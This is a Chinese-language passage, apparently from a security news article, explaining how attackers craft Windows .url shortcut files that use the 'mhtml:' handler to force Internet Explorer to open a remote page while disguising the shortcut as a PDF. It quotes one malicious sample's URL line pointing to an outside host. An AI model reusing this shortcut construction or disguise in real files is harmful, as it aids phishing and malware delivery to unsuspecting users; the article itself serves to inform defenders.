正文
那么接下来,我们就先了解一下这个能在 Windows 中调用 IE 浏览器的“mhtml”技巧。
一般情况下,Internet 快捷方式文件(即 .url)是一个文本文件,里面包含各种配置信息,如显示什么图标、双击时打开什么链接等。将其保存为 .url 文件并双击后,Windows 会在默认浏览器中打开这个 URL。
然而,攻击者发现可以在 URL 指令中使用 mhtml: URI 处理程序,以此强制用 IE 浏览器打开指定的 URL。以下面这个恶意 .url 样本为例:
可以看到,.url 文件的最后几行字符串指向 Microsoft Edge 应用程序文件中的一个自定义图标。乍一看,它似乎指向一个 PDF 文件,但实际上并非如此。CPR 研究人员发现这个关键字的值与通常的关键字有很大不同:普通 .url 文件的参数类似于 URL=https://www.google.com;但这个恶意样本的值是 URL=mhtml:http://cbmelipilla.cl/te/test1.html!x-usc:http://cbmelipilla.cl/te/test1.html。
它使用了一个特殊的前缀“mhtml:”。简单说明一下 MHTML,这是一种“聚合 HTML 文档的 MIME 封装”文件,是 IE 浏览器中引入的一种存储文件技术,可将包括图像在内的整个网页封装成一个单一档案。
CPR 研究人员指出,这样的恶意 .url 文件在 Windows 11 中会显示为一个指向 PDF 文件的链接:
